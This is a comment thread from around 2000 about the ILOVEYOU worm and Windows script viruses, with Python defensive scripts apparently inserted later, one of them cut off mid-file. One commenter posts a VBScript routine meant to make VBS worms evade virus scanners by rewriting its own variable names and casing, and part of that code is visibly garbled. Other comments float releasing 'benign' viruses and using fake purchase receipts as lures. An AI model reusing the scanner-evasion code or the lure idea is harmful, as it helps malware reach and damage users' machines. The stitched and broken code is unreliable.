>A: Three words: Robert Morris' worm.
My memory is a little hazy on this, but wasn't Robert Morris' worm released around 1988 or so? If it was, Linux wouldn't have been affected by it any more than it's being affected by the current crop of Microsoft viruses.....
You are forgetting one major factor: Choice.
I may choose to read or ignore a book about murder. I happen to like that genre actually, nearly as much as I like film noir. But still, the difference is that I *choose* to read that subject.
On the other hand a virus is basically a hit and run _crime_. As one of the other respondents above remarked, modern art, by my standards would not be considered art. I disagree because I can ignore it. I may not call it art, but someone else may. I cannot ignore a virus, even if I am running a nearly immune system.
To compound the issue, not only do viruses steal your ability to ignore them, the nastier ones tend to cost money. Either the viruses destroy work product or they create work for the admin who then has to fix his network.
If you want to call it art, fine, as long as the creator makes it performance art. Like boxing...so I can add to the performance.
In the immortal words of Socrates, who said; 'I drank what?'
"I'm surprised no one has even thought of not associating .vbs files as executables with explorer, have notepad open them instead. "
People have thought of it..
In fact, I created a simple .reg file to do this, and emailed it to all of the users here (as well as another organization that got hit the last time).. it worked pretty well.
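The two posts above (the registry listing and the .reg-to-Notepad fix) describe the same audit: find every file class whose Shell verb hands the file to WScript.exe or CScript.exe, then repoint the default Open verb at Notepad. The Python below is an added example, not code from either poster; it reads an offline `reg export HKEY_CLASSES_ROOT` dump (the sample text is constructed, mirroring the keys quoted above) and emits the hardening .reg fragment. Using `notepad.exe` without a full path is an assumption.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of a "reg export HKEY_CLASSES_ROOT" dump, NOT taken from a real
# machine; the key/verb/command layout mirrors the entries quoted in the thread.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\vbsfile\Shell\Open\Command]
@="C:\\WINNT\\System32\\WScript.exe \"%1\" %*"

[HKEY_CLASSES_ROOT\vbsfile\Shell\Open2\Command]
@="C:\\WINNT\\System32\\CScript.exe \"%1\" %*"

[HKEY_CLASSES_ROOT\JSEFile\Shell\Open\Command]
@="C:\\WINNT\\System32\\WScript.exe \"%1\" %*"

[HKEY_CLASSES_ROOT\txtfile\Shell\Open\Command]
@="C:\\WINNT\\NOTEPAD.EXE %1"
'''

# Executables that run whatever script file is handed to them on the command line.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
COMMAND_KEY = re.compile(r"^HKEY_CLASSES_ROOT\\([^\\]+)\\Shell\\([^\\]+)\\Command$", re.I)


def reg_unescape(value: str) -> str:
    """Undo .reg escaping: a backslash-escaped character stands for itself (one pass)."""
    return re.sub(r"\\(.)", r"\1", value)


def parse_default_values(export_text: str) -> Dict[str, str]:
    """Map every key in the export to its unescaped default ("@") value, in file order."""
    values: Dict[str, str] = {}
    current = None
    for raw in export_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
        elif current and line.startswith('@="') and line.endswith('"'):
            values[current] = reg_unescape(line[3:-1])
    return values


def command_executable(command: str) -> str:
    """Lower-cased basename of the program a Shell command value launches."""
    cmd = command.strip()
    head = cmd[1:].split('"', 1)[0] if cmd.startswith('"') else cmd.split(" ", 1)[0]
    return head.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_script_host_handlers(export_text: str) -> List[Tuple[str, str, str]]:
    """Return (file class, verb, executable) for every Shell verb that runs a script host."""
    found = []
    for key, command in parse_default_values(export_text).items():
        match = COMMAND_KEY.match(key)
        if not match:
            continue
        exe = command_executable(command)
        if exe in SCRIPT_HOSTS:
            found.append((match.group(1), match.group(2), exe))
    return found


def remediation_reg(export_text: str) -> str:
    """Emit a .reg fragment pointing each script-host 'Open' verb at Notepad.

    Verbs other than Open (e.g. the explicit 'Open2' / cscript entry quoted in the
    thread) are left alone so a script can still be run deliberately from a prompt.
    'notepad.exe' without a path is an assumption (resolved via PATH / App Paths).
    """
    lines = ["Windows Registry Editor Version 5.00", ""]
    for file_class, verb, _exe in find_script_host_handlers(export_text):
        if verb.lower() != "open":
            continue
        lines.append(f"[HKEY_CLASSES_ROOT\\{file_class}\\Shell\\{verb}\\Command]")
        lines.append('@="notepad.exe \\"%1\\""')  # .reg escaping of: notepad.exe "%1"
        lines.append("")
    return "\n".join(lines)


if __name__ == "__main__":
    for file_class, verb, exe in find_script_host_handlers(SAMPLE_EXPORT):
        print(f"{file_class:12} {verb:6} -> {exe}")
    print(remediation_reg(SAMPLE_EXPORT))
```

Run it against a real export (`reg export HKEY_CLASSES_ROOT hkcr.reg`) and review the generated fragment before importing it; the txtfile entry in the sample shows that only script-host handlers are reported.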
I'm getting a little bored now hearing about the same bugs in 200 different forms. All those virus idiots should take off for the summer and let everyone that fell for the first one recoup. If the "Virus Community" really wants to do something good ("bad"...whatever!!) come up with the best virus protection ever...not only will you get more recognition than a virus would but you would make a buttload of money....stir it around....buenos nachos!!
No, it's a trojan horse. It's a piece of malicious code delivered in a way to use deception to trick someone into executing the program.
I've seen a production system that has a component which delivers itself to hosts around the network as a virus. It has brakes, but it's a virus. It does real work in the real world.
A worm...
I hope they get their security right so that only the good program is allowed to replicate by the carrier machines.
__
__
Men with no respect for life must never be allowed to control the ultimate instruments of death.
GW Bu
You mean it was a worm written by a cracker, not a virus written by a hacker?
Anyhow, I never really cared much for language purism. Language evolves. That's not to say that these distinctions aren't important within certain technological circles. If I were writing a technical article for some journal on computer security, I would want to get it right. But for the mainstream, "virus written by a hacker" is plainly the accepted terminology.
Another way to look at this is that "virus" is being used as a general term for all potentially destructive computer programs, and that "trojan", "worm" and "hostile applet" are just subclasses of "virus".
Now you /. people can sit there and gripe all day about what people ought to say, but you're not going to win.
Wouldn't it be more interesting to simply look at these things as linguistic trends rather than errors?
In a sense, English and other languages are the first collaborative Open Source project ever. Yet so many /.ers fail to realize that, and refuse to participate, because they are hung up on language purism.
For all intensive purposes, "whom" is no longer a word. That begs the question, "who cares"?
From the Good Times virus hoax FAQ, the original message announcing the Good Times virus read:
Thought you might like to know...
Apparently, a new computer virus has been engineered by a user of America Online that is unparalleled in its destructive capability. Other, more well-known viruses such as Stoned, Airwolf, and Michaelangelo pale in comparison to the prospects of this newest creation by a warped mentality.
What makes this virus so terrifying is the fact that no program needs to be exchanged for a new computer to be infected. It can be spread through the existing e-mail systems of the InterNet.
Luckily, there is one sure means of detecting what is now known as the "Good Times" virus. It always travels to new computers the same way - in a text e-mail message with the subject line reading simply "Good Times". Avoiding infection is easy once the file has been received - not reading it. The act of loading the file into the mail server's ASCII buffer causes the "Good Times" mainline program to initialize and execute.
The program is highly intelligent - it will send copies of itself to everyone whose e-mail address is contained in a received-mail file or a sent-mail file, if it can find one. It will then proceed to trash the computer it is running on.
The bottom line here is - if you receive a file with the subject line "Good Times", delete it immediately! Do not read it! Rest assured that whoever's name was on the "From:" line was surely struck by the virus. Warn your friends and local system users of this newest threat to the InterNet! It could save them a lot of time and money.
The Good Times virus described by that message never existed. You can claim that the message itself is a virus, but then it wouldn't be the Good Times virus, it would be the "meta-Good Times virus." (And if I get you to repeat this description to your friends, you could call that the "meta-meta-Good-Times virus," and then they could spread the "meta-meta-meta-Good-Times virus" and so on... GEB, here we come! =])
-jacob
I used to think that way about virus/worm and hacker/cracker. But English terms change meaning whether you like it or not. This FAQ was written over 5 years ago. Since then the scope of people using these terms has changed significantly. The public can't remember hundreds of jargon words, so hacker and cracker become one, "cracker", and virus and worm become "virus". "Virus software" has to protect against what we knew as worms as well as viruses. You don't market "Norton anti-worm/virus" software or people are going to think it's a medicinal product. 99% of people have never heard the term worm, yet most know that a virus is something bad you can get. To make matters worse, the distinction on how it propagates is only understandable by technical people. There is no logical reason for most people to call one thing a virus and the other thing a worm.
I think this is partially a case of technical people feeling they are elite and need to correct people who could care less, much like an English teacher who corrects your speech that no one else sees a problem with. You have to speak the language of the people when you report in the media. It's not that the reporters don't know what a worm is (though I'm sure many don't), it's that you (and your other 1%) are not their target audience.
-- Virtual Windows Project
companies that make virus scanners write at least some of the viruses in order to stay in business.
Is that too crazy to be true? I don't think so.
--
Moderate this up!
Though obviously MS is the prime culprit here, that goes without saying.
Female Prison Rape in NY
One could assume that the virus would FIRST duplicate itself, and THEN fix the register. :o)
Phobos - Greek word for fear or flight
Here.
I'm really sick of people focusing on VBScript as some kind of token of Microsoft Evil(tm). The thing about this Trojan is it could have been done on any system, VBScript or not. Let's look at what it does.
1. Gets sent as an attachment.
2. User executes an attachment (big mistake).
3. Attachment does bad stuff.
Basically it's a program that does bad stuff. Well shit, any program could do some pretty nasty things if it wanted to. You could write a little sh or perl script to mail all your friends with some little attachment, then wipe anything with a+rw perms, and hell a lot of the newer linux users might even run it.
This program has got so well propagated due to the generally low computer literacy of Windows users. All my friends (who are geeks) were not so foolish as to run this attachment, nor did they run programs like "fun.com", from some kids' "3l33e3e" web site. It's just the law of the land.
-Jon
this is my sig.
Damn, I got hit with a variant of this!
- YOU HAVE NOW RECEIVED THE UNIX VIRUS -
This virus works on the honor system:
If you're running a variant of unix or linux, please forward
this message to everyone you know and delete a bunch of your
files at random
And just after I got done restoring my files from backup, I was hit again by a different variant!!!
Will the horror never end?
:0)
Steven Rostedt
Steven Rostedt
-- Nevermind
*WARNING* The following contains instructions which may cause great harm to your computer if done incorrectly. Use this technique at your own risk. *WARNING*
Here's how to cut Melissa & her children off at the knees:
Close MS (swear)Word and Excel.
Open an Explorer window, navigate to C:\Program Files\Common Files\Microsoft Shared\VBA
Create a folder called "Pit of Hell"
Move all files that start with "Vba" into the "Pit of Hell" folder. If Windows whines that a file is in use you may have to reboot to do this step.
This prevents VBA from working at all. Word and Excel continue to work, you just may see a message saying 'Unable to initialize Visual Basic environment'. This is a good thing. Occasionally a document completely refuses to open but I just send it back to the originator and ask them to "save it in RTF format, please". If you absolutely need to open a document with VB scripts just move VBA out of the Pit of Hell back where it came from (temporarily of course).
--
My other computer is your IIS server.
A while back some rather paranoid chaotic individual who shall remain nameless suggested that perhaps the guys who make their living with the virus scanners and virus cleaning software are behind a good portion of the most destructive viruses out there. That theory is patently silly, of course. Isn't it?
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
The idea of a paperclip wagging its finger at me, left me speechless the first time I saw it...
Wasn't there a notice recently that someone found a scripting hole with said paperclip?
`It looks like you're trying to 0wn this box; would you like me to help?'
Matthew @ Bytemark Hosting
in case anybody is interested... at http://noxxi.net/misc/mf.pl is a small script which simply renames all dangerous attachment names (which is everything except a view) so that they don't get executed on click. I use it in the company I work for (mail gets loaded by fetchmail, piped thru this script and then forwarded to the recipient)
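A Python version of the filter just described, added here as an example (it is not the mf.pl script from that post): every attachment whose last extension is not on a "viewable" allow-list gets ".txt" appended, so a double-click opens a viewer rather than the script host, and a ".TXT.vbs" double extension is caught because only the final extension counts. The message, the allow-list and the suffix are constructed assumptions.

```python
import email
from email.message import Message
from typing import List, Tuple

# Allow-list of extensions a mail reader merely displays (assumption: this is what the
# post means by "a view"); anything else, including no extension at all, is renamed.
VIEWABLE = {"txt", "rtf", "htm", "html", "pdf", "jpg", "jpeg", "gif", "png"}
SUFFIX = ".txt"  # appended so the file opens in a viewer, not in a script host

# Constructed test message (not a real sample): a .vbs hidden behind ".TXT", plus an image.
SAMPLE_MAIL = b"""From: alice@example.invalid
To: bob@example.invalid
Subject: re: the file you asked for
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="constructed-boundary"

--constructed-boundary
Content-Type: text/plain; charset="us-ascii"

see attached
--constructed-boundary
Content-Type: application/octet-stream; name="READ-ME.TXT.vbs"
Content-Disposition: attachment; filename="READ-ME.TXT.vbs"
Content-Transfer-Encoding: 7bit

' constructed placeholder, not a real script
--constructed-boundary
Content-Type: image/gif; name="photo.gif"
Content-Disposition: attachment; filename="photo.gif"
Content-Transfer-Encoding: base64

R0lGODlhAQABAAAAACw=
--constructed-boundary--
"""


def safe_name(filename: str) -> str:
    """Keep the name if its LAST extension is viewable; otherwise append SUFFIX."""
    ext = filename.rsplit(".", 1)[1].lower() if "." in filename else ""
    return filename if ext in VIEWABLE else filename + SUFFIX


def defang_message(raw: bytes) -> Tuple[bytes, List[Tuple[str, str]]]:
    """Rename every non-viewable attachment; return the rewritten mail and the renames."""
    msg: Message = email.message_from_bytes(raw)
    renamed: List[Tuple[str, str]] = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_filename()
        if not name:
            continue
        new_name = safe_name(name)
        if new_name == name:
            continue
        # The file name can live in either header; rewrite whichever is present.
        for header, param in (("Content-Disposition", "filename"), ("Content-Type", "name")):
            if part.get_param(param, header=header) is not None:
                part.set_param(param, new_name, header=header)
        renamed.append((name, new_name))
    return msg.as_bytes(), renamed


def attachment_names(raw: bytes) -> List[str]:
    """File names as a receiving mail client would see them."""
    msg = email.message_from_bytes(raw)
    return [p.get_filename() for p in msg.walk() if not p.is_multipart() and p.get_filename()]


if __name__ == "__main__":
    rewritten, changes = defang_message(SAMPLE_MAIL)
    for old, new in changes:
        print(f"renamed {old!r} -> {new!r}")
    print(attachment_names(rewritten))
```

In a fetchmail pipeline the script would read the raw message on stdin and write `defang_message(...)[0]` to stdout before handing the mail to local delivery.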
Yah, *we* might know this, but your average win9x user doesn't. They kinda understand a virus, to the extent that they know it's bad, but let's not give them too much credit for intelligence. Worms, trojans, virus, etc. Just call it a virus & don't confuse them.
jred
I'm not a mechanic but I play one in my garage...
And they don't have you in their address books fuckhead.
I know this isn't all that great of code, especially since it doesn't actually reprogram itself (like any good polymorphic script should do) but this makes most VBS virii/worms be undetectable to standard virii scanners. My question is 'Why don't virii scanning companies just make smarter scanners?'
-------------
dim debug
sub debuglog(text)
debug=debug & vbcrlf & "dbug-" & text
end sub
'----------------- remove the above function, its crap....
dim fso,jogger,ViriiFile ' jogger is the string containing this file
set fso=CreateObject("Scripting.FileSystemObject")
'set Viriifile=fso.OpenTextFile(Wscript.ScriptFullname, 1)
set Viriifile=fso.OpenTextFile("C:\tmp.txt", 1)
jogger=Viriifile.ReadAll
viriiFile.close
function crypt(text, offset)
if offset =255 then
char=char-255
elseif char1 and not asc(mid(file(i),j-1,1)) = 60 and not asc(mid(file(i),j-1,1)) = 62) then
for k=1 to int(rnd*3)+1
replaceline=replaceline & chr(32)
next
replaceline=replaceline & chr(61) ' add = in...
for k=1 to int(rnd*3)+1
replaceline=replaceline & chr(32)
next
end if
case else
replaceline=replaceline & mid(file(i),j,1)
end select
next
' wscript.echo "We are replacing line: " & vbcrlf & file(i) & vbcrlf & "With:" & vbcrlf & replaceline
file(i)=replaceline
if (rnd*10)+1=1 then file(i)=file(i) & vbcrlf
next
dim FileToChange
filetochange=wscript.scriptfullname
set viriifile=fso.CreateTextFile(FileToChange,true)
viriifile.write join(file,vbcrlf)
viriifile.close
end function
main()
sub main()
'add these lines to the original 'virus' or worm
polychange()
ReplaceVariables()
if len(debug) >0 then wscript.echo debug
end sub
'-------------------- below is the variable variables stuff.
Sub ReplaceVariables()
dim fso,moose,MiaFile ' hehe very descriptive names.... heh 'moose' and 'MiaFile' I think I was on crack when i wrote this stuff
set fso=CreateObject("Scripting.FileSystemObject")
set MiaFile=fso.OpenTextFile(Wscript.ScriptFullname, 1)
moose=MiaFile.ReadAll
MiaFile.close
dim VariablesList,alist,newvarname
variableslist="MiaFile,variableslist,ReplaceVariables,moose,newvarname"
'------------ THE ABOVE LIST MUST CONTAIN ALL VARIABLE NAMES AND ALL FUNCTION NAMES (keep them unique and not occuring naturally anywhere else (that means change all my for(i) loops to for (fruityi) or something... make them unique!
alist=split(variableslist,chr(44))
for i=0 to ubound(alist)
newvarname=RandomVarName()
moose=replace(moose,alist(i),newvarname,1,-1,1) ' we dont want a binary compare...
Next
set MiaFile=fso.CreateTextFile(wscript.scriptfullname, true)
dim odd,newmoose
for i=1 to len(moose)
if int((rnd*3)+1)=1 then
newmoose=newmoose & ucase(mid(moose,i,1))
else
newmoose=newmoose & lcase(mid(moose,i,1))
end if
next
MiaFile.write newmoose
MiaFile.close
End Sub
function RandomVarName()
randomize
dim length,char
length=int(rnd*20)+20
for i=1 to length
char=chr(int(rnd*26)+97)
' if int(rnd*2)=1 then char=ucase(char) ' I decided this wasnt needed
randomvarname=randomvarname & char
next
End Function
Ever need an online dictionary?
Anti-viruses are benign viruses, but all viruses are evil.
Myself, I don't want anything propagating through a clandestine channel onto my machine, thank you very much. I certainly don't want some do-gooder code messing with my machine behind my back. Most of my friends feel the same way. I would very much not want to be responsible for transmitting such a virus to their machines.
Back in the good old days when software moved via 5.25in disks, did you ever propagate a virus, (even a benign one) to a bunch of friends? I remember what that felt like. "Did you get a disk from XYZ? Yeah? I got one; had a lot of viruses on it. I think you should check your machine." It's like having some horrible social disease.
Executive summary:
Once more unto the breach, dear friends, once more, Or close the wall up with our American dead!
It helps to thin out the herd. What you want is a more or less constant nonzero low probability of catching and incurring damage from one worm/virus/trojan or another. This will serve to harden the resistance of the community and cull out the weaklings. Just like in the solid world the most destructive virulent phages do not have the best longevity because they kill too many of their hosts too quickly. Ergo the likelihood of some super Marburg or Ebola with 97%+ mortality spreading all over the world is rather low. Of course the garden variety with 70%+ mortality is none too good either. OTOH a continual exposure to less virulent forms of other types of phages actually hardens both the individual and the community, leaving it better prepared to resist the next variant. Exhibit the indigenous peoples of the Americas in the 15th-16th C. exposed to Smallpox for the first time. Infected populations decreased by 90% in <10 years whereas the Europeans were already largely resistant and could survive even many epidemics with <25% mortality.
So it is with a dynamic community of computers. Somebody who doesn't have a scanner will die. Somebody who rarely updates the sig files will die. Somebody who doesn't think it can happen to them will die. Someone who doesn't pay attention and goes on as normal will die. Somebody who is more thorough and less trusting or ignorant will survive. Remember not all of these screaming headlines are about viruses at all. They are simply a matter of behavior and social engineering. Do you think as many people would have been infected if the ILY worm had a heading that said "opening this note will destroy or damage your machine and the machines of everyone in your address book." Of course not.
Which leads me off in another tangent. How to get more people to open destructive messages since everyday we're more jaded and suspicious? Well if I was a badguy what I'd do is use the message header to refer to some online purchase. Sure, if you didn't buy anything then you'd be less likely to open the message but the people who did would probably open the message approaching 100%. So what is a poor website to do? It seems that one avenue that should be pursued for this and for eComm generally is a way to generate a CRC at the point of purchase and then send the confirmation/receipt with the CRC in the header so that before you do anything you manually cross check the numbers to insure they match. Or something like that. I guess I'll stop blathering now.
I've been using NT4 since it came out, and I didn't have the slightest idea that QBASIC was in there. I know QBASIC is not the world's greatest programming language but it sure beats nothing at all. And I can assume it is on every one of the NT machines at my office.
I gave up on BASIC about ten years ago when I realized that I had learned at least nine versions of it (including Timex-Sinclair BASIC and Wang BASIC-2), and none of them had anything in common; if you wanted to write something in BASIC #9 all that knowing BASICs #1 through #8 did for you was confuse the Hell out of you. But if there's a programmming language already installed by default on every PC in the office, I guess I'm going to have to brush up my QBASIC skills again. Thanks a million, greenrd, for this unexpected piece of good news!
I'll bet MS took it out of Win2K, though.
Yours WDK - WKiernan@concentric.net
Check out the virus warning I recently came across:
Pay close attention to this warning!
If you receive an email entitled "Bad-times," delete it immediately. Do
not open it. Apparently this one is pretty nasty. It will not only erase
everything on your hard drive, but it will also delete anything on disks
within 20 feet of your computer through the use of subspace field
harmonics. It demagnetizes the stripes on ALL of your credit cards. It
reprograms your ATM access code, screws up the tracking on your VCR and
uses subspace field harmonics to scratch any CD's you attempt to play. It
will program your phone auto dial to call only your mother-in-law's
number. This virus will mix antifreeze into your fish tank. It will drink
all your beer. (For God's sake man are you listening?) It will leave
dirty socks on the coffee table when you are expecting company. It will
replace your shampoo with Nair and your Nair with Rogaine, all the while
dating your current boy/girlfriend behind your back and billing their
hotel rendezvous to your Visa card. It will cause you to run with
scissors and throw things in a way that is only fun until someone loses an
eye. It will rewrite your backup files, changing all your active verbs to
passive tense and incorporating undetectable misspellings, which grossly
change the interpretations of key sentences. If the "Bad-times" message
is opened in a Windows95/98 environment, it will leave the toilet seat up
and leave your hair dryer plugged in dangerously close to a full bathtub.
It will not only remove the forbidden tags from your mattresses and
pillows; it will also refill your skim milk with whole milk.
*********WARN AS MANY PEOPLE AS YOU CAN.*********
Hope I don't get that one.
http://crummysocks.com
Viruses do not have to have a destructive payload. One could create a virus that was self-replicating and beneficial. Also there is the challenge of creating one. Why climb a mountain? Because it's there. Why write virus code? Because one can.
The challenge of writing self-replicating code in any language from scratch is just too large for any self respecting hacker to ignore. That is not to say that one should create a destructive virus and release it, but creating a nondestructive self-replicating program for proof of concept purposes is ok.
I've examined the source code to many viruses and most are crap. Only a few are true works of art. Most of these came from Bulgaria and they incorporate features that are truly interesting like stealth and the ability to hide changes in file size and memory used.
Environmentalists are their own worst enemy. ~tricklenews.com
...but only because I'm a coward.
If I was absolutely sure I wouldn't be caught, I'd be putting out viruses to beat the band. Why? Many reasons:
-to see if I can
-to point out security problem in a dramatic manner
-"tough love"
-how does a given virus spread and to whom?
-what can I make a virus do?
As an example of this last one, I was thinking of a hypothetical virus in the shower this morning. The virus is non-malicious. It just installs a daemon on your computer. But the daemon is like a distributed.net client. So once it got propagated pretty good, I could submit tasks to these daemons and get answers back. Pretty neat, huh? Now make the daemons talk to each other. Make them pass MP3s (and DeCSS) back and forth. Hey! I've re-implemented FreeNet! If you read Slashdot you have to admit this idea intrigues you.
BTW, I would do this all anonymously. I wouldn't be in it for the attention. Just the intellectual stimulation.
--
Have Exchange users? Want to run Linux? Can't afford OpenMail?
Linux MAPI Server!
http://www.openone.com/software/MailOne/
(Exchange Migration HOWTO coming soon)
I LIKE IT!
:)
We're genetically engineering bacteria to eat oil spills, and designing cancer cells to secrete insulin. We're cloning sheep and making real viruses to attack malignant tumors.
Somehow, the symmetry of a worm that scours the Internet exploiting M$ security holes in an effort to fix them is.. poetic. Sort of like autonomous garbage collection.
Arguably, any virus/worm that deletes Windows system files is already trying to do this; but in a very heavy-handed way. A lighter touch is called for. Disabling the registry settings that allow auto-invocation of scripts attached to email is one good way to make the world a better place.
And hey! How could anyone (besides Micros~1) get upset over a benevolent virus?
Maybe it could even open a pop-up on the screen every 20 minutes, to remind the user to stretch their hands to prevent RSI?
Maybe it could replace the talking paper-clip with a talking Penguin? "I see you're trying to write a letter. Wouldn't you rather write it on actual paper, and add some humanity to your interpersonal communication?" "I noticed your key-stroke rate drop over the last hour. You seem tired. Shall I have some pizza delivered?"
-- What you do today will cost you a day of your life.
Next thing: Murder as art...
Raymond Chandler considered murder to be art, his art. This is a cool little book.
Yours WDK - WKiernan@concentric.net
(I hope somebody reads this, I'm posting it too late...)
Everyone from the clueless media to Slashdot's "experts" have been warning people about how bad Outlook's "security" is, and how anyone can send you an email that will make your computer explode. I've been one of the few people struggling to point out that ILOVEYOU was a trojan, not a virus; it cannot run when you read an email, it can only run if you launch the executable attachment.
But the media has been telling everyone to "delete any email with X/Y/Z in the subject line before even opening it!" Whenever I complain that that's not necessary, the response is, "Better safe than sorry."
Well, spreading false information in the name of "better safe than sorry" is almost never safe. That advice is useless against this new program. On the other hand, if folks had spent the past two weeks telling people that protecting against trojans is the user's responsibility, not Outlook's, then this new variant would be a non-issue.
Granted, the false information on Slashdot has probably had less of an impact on the public's misunderstanding of the issue than the false information being spread by CNN, NBC, etc. But considering that Slashdot is (by and large) a community of experts in the field, I think we should be providing some sane leadership, instead of helping the hysteria along.
MSK
I have yet to receive this e-mail worm, so I'd be very interested in seeing the VBS source.
--
"Oppression and harassment is a small price to pay to live in the land of the free." -- Montgomery Burns.
I'm CTO of a Company in NYC..we are a 100% (OK..99%..our graphic artists insist on Macs) Linux based company. Our secretary uses Kmail...she had ZERO problems learning how to use it. Anyone can use Linux. I'm not talking about installing..but using it. I set my mother up (who is 59) with Linux....Set her up with StarOffice, Gnomeicu and even Laim.....she's happy as a clam and hasn't had a problem (meaning she hasn't called me for help)
If you're not a Liberal in your 20's, then you have no heart. If you're still a Liberal in your 30's you have no brain.
the OS everytime some idiot decides an epidemic?
This is what I found at symantec's website:
How to Repair
You will need to restore from a full backup, or, if that is not available, reinstall all software, including the operating system, and then restore data from backup. This worm deletes the contents of all files on the system, leaving the affected files with a byte length of zero. This effectively destroys all files on the system, and will render the computer inoperable. The worm also appends the extension .vbs to each of these files. Because of this, no removal is possible once the worm has activated. This document will be updated as new information becomes available.
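An added Python sweep for the on-disk footprint this thread and the quoted Symantec text describe (not code from the thread or from Symantec): it walks a directory tree, classifies every *.vbs file by whether the original data file is still present, was replaced, or was emptied to zero length, and the sample tree it builds is constructed.

```python
"""Post-incident sweep for the ILOVEYOU family's on-disk footprint.

Per the thread: the original worm overwrote jpg/jpeg files and renamed them
to name.jpg.vbs (original gone), wrote name.mp3.vbs beside each mp3/mp2 and
only hid the original, and the variant quoted from Symantec empties files to
zero length and appends .vbs. Added example; the sample tree is constructed.
"""
import os
import tempfile

RENAMED_AND_DELETED = {"jpg", "jpeg"}   # original overwritten, then deleted
SIBLING_KEPT = {"mp3", "mp2"}           # original kept (hidden), copy written beside it


def classify_vbs(path):
    """Classify one *.vbs file found on disk; returns (category, path_of_interest)."""
    parts = os.path.basename(path).lower().split(".")
    if len(parts) < 3:
        # A plain .vbs with no inner extension: possibly a dropped worm body itself.
        return ("standalone_vbs", path)
    inner_ext = parts[-2]
    original = path[: -len(".vbs")]
    if os.path.getsize(path) == 0:
        # The variant's destruction: nothing left to recover from this file.
        return ("emptied_and_renamed", path)
    if inner_ext in SIBLING_KEPT and os.path.exists(original):
        # mp3/mp2 case: the data file is still there, only hidden.
        return ("original_recoverable", original)
    if inner_ext in RENAMED_AND_DELETED or not os.path.exists(original):
        return ("original_overwritten", path)
    return ("suspicious_double_extension", path)


def sweep(root):
    """Walk root and group every .vbs file by category (paths relative to root)."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(".vbs"):
                cat, p = classify_vbs(os.path.join(dirpath, fn))
                rel = os.path.relpath(p, root).replace(os.sep, "/")
                findings.setdefault(cat, []).append(rel)
    return findings


def build_sample_tree(root):
    """Constructed tree resembling a hit machine, following the thread's description."""
    def write(rel, data):
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as f:
            f.write(data)

    marker = b"rem barok -loveletter(vbe)\r\nOn Error Resume Next\r\n"  # stand-in for a worm copy
    write("WINDOWS/SYSTEM/MSKernel32.vbs", marker)        # dropped copy, as in the posted source
    write("My Documents/holiday.jpg.vbs", marker)         # jpg overwritten and renamed, original gone
    write("My Music/song.mp3", b"\xff\xfb" + b"\x00" * 16)  # original mp3 kept (would be hidden)
    write("My Music/song.mp3.vbs", marker)
    write("My Documents/report.doc.vbs", b"")             # variant: contents destroyed
    write("My Documents/notes.txt", b"untouched")


def demo():
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return sweep(root)


if __name__ == "__main__":
    for cat, paths in sorted(demo().items()):
        print(cat)
        for p in paths:
            print("   ", p)
```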
bwaaahhhaaaaahahahahahahaa
And to those who are claiming that "virus" is just as correct: I agree that the meanings of "hacker" and "cracker" are blending. However, these two terms are technical, not social. Definitions of technical terms are specific, based on certain criteria, not on the vagaries of public usage, much like the common misunderstanding between codes and ciphers.
The fact that most people don't understand the difference doesn't mean that the difference doesn't exist.
"You can never have too many elephants on your team."
The worst thing about this is that since Windows hides file extensions by default, many users don't even know what a .vbs file is. IIRC, when ILOVEYOU went around, the "warhead" file was actually named iloveyou.txt.vbs or something of the sort, so most users (those with filename extensions hidden) would see iloveyou.txt and not think twice about it.
I took care of this by creating an empty text file, changing the extension to .vbs, and sending it around the company so that everyone could see what the icon for the file looks like, regardless of what the filename appears to be.
Aero
We can believe in you for 3 minutes, but beyond that, even the King of All Cosmos can't be expected to wait.
The idea of a paperclip wagging its finger at me, left me speechless the first time I saw it... Wasn't there a notice recently that someone found a scripting hole with said paperclip?
There is a name for what Microsloth is doing when it builds worm encouraging products: Breach of Professional Duty -- they are supposed to know better.
Yea, they yammered "the customers want this"... A former BBC managing director said it best: "We know precisely what they want, and we will not give it to them". Like "Fiduciary responsibility" demanded of those that manage others' money, if you know that something is truly stupid, you are required to say "NO". You are the expert, they are the common man. (take my retirement money and buy tulips...)
If I were a 14yr old kid learning VBscript, when I read the bit about embedding in email, I would feel morally obligated to write a worm to exploit it. The grownups should know better.
Organizer:New England Rubbish Deconstruction Society;The NERDS,first US team in the UK Scrapheap Challenge/Junkyard Wars
If a system was designed so that no process could read its own executable file, would this prevent viruses from working?
Okay, I've got no idea about whether this would break other applications, or whether there would be a way around it. Might work though.
*i* (and many other /.ers) use pine.
slaves.
remember, these virii are only propagated by the widespread use of software that equates to welfare for IT/MSCE's.
--ze, who needs more caffeine to work out the morning crankies
I don't dress this way to be scary. I dress like this because it's easier to sort my laundry. "...black...black...blac
>Anyone that thinks Linux is immune from virii is a moron. These are
>just simple attachments that dumb people run on their machine. People
>can run attachments on any OS, folks. It's the USERS that are stupid,
>not the client or the OS.
Use Mutt or Pine on Linux/Unix and then say that.
there must be another way to convert micro$oft users to linux than a deadly virus?
I agree that it is not an OS issue, (assuming the OS does not allow you to modify system or other users files, i.e. Not Win9x). But I think it is a client, rather than user issue.
Code coming from an unverified source (i.e. not from a trusted installer) should not be allowed to run outside a sandbox. It works fine for Java on the web. The same treatment should apply to anything coming in an email.
Furthermore, any file extracted from an email should be marked non-executable. (The user can chmod it - if they know enough to do that, they can probably understand the risk). Archives are a bit more tricky, but changing umask(2) to 666 before invoking an archive program (such as tar) should do the trick I guess.
The Evolution folks are implementing a Visual Basic clone in their new gnome client. But they are doing it properly, using a Java-like security model.
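The attachment handling argued for in this thread (flagging the hidden double extension of LOVE-LETTER-FOR-YOU.TXT.vbs a few posts up, and writing anything extracted from mail to disk without execute bits) as an added Python example; this is not code from the thread or from any mail client, and the sample message, quarantine directory and extension lists are constructed here.

```python
"""Mail attachment triage: spot script attachments masquerading behind a
double extension, and save extracted attachments non-executable.
Added example; the sample message below is constructed."""
import email
import email.policy
import os
import stat
import tempfile
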